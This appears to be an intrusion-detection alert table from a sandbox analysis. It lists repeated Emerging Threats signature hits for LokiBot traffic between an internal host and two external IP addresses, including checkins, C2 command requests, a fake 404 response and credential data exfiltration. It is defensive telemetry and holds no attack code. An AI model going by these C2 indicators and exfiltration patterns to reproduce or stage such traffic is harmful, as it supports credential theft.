                  192.168.2.3188.114.97.349743802024317 08/11/22-06:42:14.045456TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802825766 08/11/22-06:42:26.308314TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349789802825766 08/11/22-06:42:55.412963TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802021641 08/11/22-06:44:07.789189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802024313 08/11/22-06:42:25.207102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349797802025381 08/11/22-06:43:05.379365TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802825766 08/11/22-06:42:56.651534TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802024318 08/11/22-06:44:00.133246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349747802021641 08/11/22-06:42:18.537201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802024318 08/11/22-06:43:31.924022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802025381 08/11/22-06:42:49.154690TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802025381 08/11/22-06:43:54.330408TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349889802024313 08/11/22-06:44:01.764745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802025381 08/11/22-06:42:35.961537TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802021641 08/11/22-06:42:12.661275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802024318 08/11/22-06:42:24.044623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349795802025381 08/11/22-06:43:03.020333TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802024313 08/11/22-06:42:24.044623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802025381 08/11/22-06:42:55.412963TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802021641 08/11/22-06:43:31.924022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802021641 08/11/22-06:42:16.160936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802024318 08/11/22-06:44:01.764745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802025381 08/11/22-06:43:10.662100TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802825766 08/11/22-06:42:35.961537TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802025381 08/11/22-06:44:03.457387TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802021641 08/11/22-06:42:41.209817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802021641 08/11/22-06:42:20.745320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349883802021641 08/11/22-06:43:53.308240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802025381 08/11/22-06:42:28.447484TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349800802024313 08/11/22-06:43:08.046752TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802024313 08/11/22-06:42:42.773950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802825766 08/11/22-06:43:48.403290TCP2825766ETPRO TROJAN LokiBot Checkin M24987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349875802825766 08/11/22-06:43:47.334573TCP2825766ETPRO TROJAN LokiBot Checkin M24987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802025381 08/11/22-06:42:17.452589TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802021641 08/11/22-06:42:46.945645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802025381 08/11/22-06:44:08.828123TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349832802025381 08/11/22-06:43:19.747801TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802024318 08/11/22-06:43:51.663595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802025381 08/11/22-06:42:31.695874TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802024313 08/11/22-06:43:51.663595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802825766 08/11/22-06:42:27.395952TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349782802025381 08/11/22-06:42:50.570997TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349800802024318 08/11/22-06:43:08.046752TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802021641 08/11/22-06:42:45.276948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349895802025381 08/11/22-06:44:06.157277TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802825766 08/11/22-06:42:58.117986TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349763802024313 08/11/22-06:42:39.324991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802024318 08/11/22-06:43:06.576803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802024318 08/11/22-06:42:39.324991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802025381 08/11/22-06:42:59.404301TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349859802025381 08/11/22-06:43:42.759258TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802021641 08/11/22-06:43:50.015660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802021641 08/11/22-06:43:28.505356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802024313 08/11/22-06:42:44.099150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802025381 08/11/22-06:42:42.773950TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802025381 08/11/22-06:42:29.610436TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802024318 08/11/22-06:42:44.099150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802021641 08/11/22-06:43:47.334573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802825766 08/11/22-06:43:58.405291TCP2825766ETPRO TROJAN LokiBot Checkin M24988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349811802024313 08/11/22-06:43:10.662100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802025381 08/11/22-06:42:41.209817TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802024313 08/11/22-06:42:55.412963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802825766 08/11/22-06:42:59.404301TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349755802025381 08/11/22-06:42:27.395952TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349762802021641 08/11/22-06:42:35.961537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802825766 08/11/22-06:44:04.916628TCP2825766ETPRO TROJAN LokiBot Checkin M24989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802024313 08/11/22-06:43:06.576803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802021641 08/11/22-06:44:00.133246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802021641 08/11/22-06:42:32.923604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349742802825766 08/11/22-06:42:12.661275TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802021641 08/11/22-06:43:19.747801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802021641 08/11/22-06:44:08.828123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349744802024313 08/11/22-06:42:15.052087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349743802021641 08/11/22-06:42:14.045456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802825766 08/11/22-06:44:01.764745TCP2825766ETPRO TROJAN LokiBot Checkin M24988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802021641 08/11/22-06:43:04.193279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802021641 08/11/22-06:43:24.421881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802024318 08/11/22-06:43:16.837786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802024313 08/11/22-06:43:40.660156TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802825766 08/11/22-06:44:09.907279TCP2825766ETPRO TROJAN LokiBot Checkin M24989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802021641 08/11/22-06:43:33.879385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802024313 08/11/22-06:43:42.759258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802024318 08/11/22-06:42:54.331478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349790802021641 08/11/22-06:42:56.651534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802825766 08/11/22-06:43:19.747801TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802024318 08/11/22-06:43:42.759258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802024313 08/11/22-06:43:16.837786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349743802825766 08/11/22-06:42:14.045456TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802025381 08/11/22-06:42:51.879415TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802021641 08/11/22-06:42:30.656105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497972025483 08/11/22-06:43:05.476572TCP2025483ET TROJAN LokiBot Fake 404 Response8049797188.114.97.3192.168.2.3
                  192.168.2.3188.114.97.349750802025381 08/11/22-06:42:21.832277TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802825766 08/11/22-06:42:41.209817TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349888802825766 08/11/22-06:44:00.133246TCP2825766ETPRO TROJAN LokiBot Checkin M24988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349850802825766 08/11/22-06:43:33.879385TCP2825766ETPRO TROJAN LokiBot Checkin M24985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802024313 08/11/22-06:44:03.457387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802825766 08/11/22-06:42:34.002289TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802025381 08/11/22-06:44:04.916628TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349789802024318 08/11/22-06:42:55.412963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802021641 08/11/22-06:43:58.405291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349889802021641 08/11/22-06:44:01.764745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802021641 08/11/22-06:42:31.695874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802825766 08/11/22-06:43:24.421881TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802024318 08/11/22-06:44:03.457387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802024313 08/11/22-06:42:19.613257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802024313 08/11/22-06:42:16.160936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802024317 08/11/22-06:42:12.661275TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802025381 08/11/22-06:43:13.321407TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802021641 08/11/22-06:44:06.157277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802025381 08/11/22-06:44:07.789189TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802024313 08/11/22-06:42:26.308314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802024313 08/11/22-06:43:31.924022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802024318 08/11/22-06:42:19.613257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802021641 08/11/22-06:42:59.404301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349887802024318 08/11/22-06:43:58.405291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349884802021641 08/11/22-06:43:54.330408TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349885802025381 08/11/22-06:43:55.376397TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802825766 08/11/22-06:42:32.923604TCP2825766ETPRO TROJAN LokiBot Checkin M24976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349774802825766 08/11/22-06:42:44.099150TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349800802021641 08/11/22-06:43:08.046752TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802025381 08/11/22-06:43:48.403290TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349817802025381 08/11/22-06:43:11.901228TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802825766 08/11/22-06:42:49.154690TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802825766 08/11/22-06:42:31.695874TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802021641 08/11/22-06:42:34.002289TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802024313 08/11/22-06:42:54.331478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349747802025381 08/11/22-06:42:18.537201TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802024313 08/11/22-06:42:58.117986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349882802021641 08/11/22-06:43:51.663595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802825766 08/11/22-06:44:08.828123TCP2825766ETPRO TROJAN LokiBot Checkin M24989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349800802825766 08/11/22-06:43:08.046752TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802024318 08/11/22-06:43:40.660156TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802021641 08/11/22-06:43:00.645450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802024318 08/11/22-06:42:15.052087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349791802024318 08/11/22-06:42:58.117986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349794802025381 08/11/22-06:43:01.964847TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802024318 08/11/22-06:43:50.015660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802825766 08/11/22-06:43:00.645450TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802024313 08/11/22-06:43:14.503252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802825766 08/11/22-06:43:51.663595TCP2825766ETPRO TROJAN LokiBot Checkin M24988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802024313 08/11/22-06:43:50.015660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802025381 08/11/22-06:43:53.308240TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802825766 08/11/22-06:42:17.452589TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802021641 08/11/22-06:42:49.154690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802024318 08/11/22-06:42:22.964431TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802025381 08/11/22-06:42:25.207102TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802024318 08/11/22-06:43:14.503252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802024318 08/11/22-06:43:28.505356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802024318 08/11/22-06:42:16.160936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802024313 08/11/22-06:42:22.964431TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802024318 08/11/22-06:42:53.219319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802024313 08/11/22-06:43:28.505356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802024318 08/11/22-06:43:47.334573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802021641 08/11/22-06:44:09.907279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802021641 08/11/22-06:42:44.099150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802024313 08/11/22-06:43:48.403290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349763802025381 08/11/22-06:42:39.324991TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802024313 08/11/22-06:43:47.334573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802021641 08/11/22-06:43:10.662100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802024313 08/11/22-06:42:49.154690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802024318 08/11/22-06:43:48.403290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349752802025381 08/11/22-06:42:24.044623TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349789802021641 08/11/22-06:42:55.412963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349780802024318 08/11/22-06:42:49.154690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802024313 08/11/22-06:42:35.961537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349762802024318 08/11/22-06:42:35.961537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802825766 08/11/22-06:42:45.276948TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349745802025381 08/11/22-06:42:16.160936TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802025381 08/11/22-06:43:31.924022TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349749802825766 08/11/22-06:42:20.745320TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349832802024313 08/11/22-06:43:19.747801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349745802825766 08/11/22-06:42:16.160936TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802024313 08/11/22-06:44:08.828123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802025381 08/11/22-06:42:20.745320TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349778802025381 08/11/22-06:42:46.945645TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349843802825766 08/11/22-06:43:31.924022TCP2825766ETPRO TROJAN LokiBot Checkin M24984380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349746802021641 08/11/22-06:42:17.452589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802825766 08/11/22-06:42:24.044623TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349756802024313 08/11/22-06:42:28.447484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3188.114.96.3
                  188.114.96.3192.168.2.380497882025483 08/11/22-06:42:54.430865TCP2025483ET TROJAN LokiBot Fake 404 Response8049788188.114.96.3192.168.2.3
                  192.168.2.3188.114.97.349800802025381 08/11/22-06:43:08.046752TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802024318 08/11/22-06:43:33.879385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802024313 08/11/22-06:42:56.651534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.3188.114.97.3
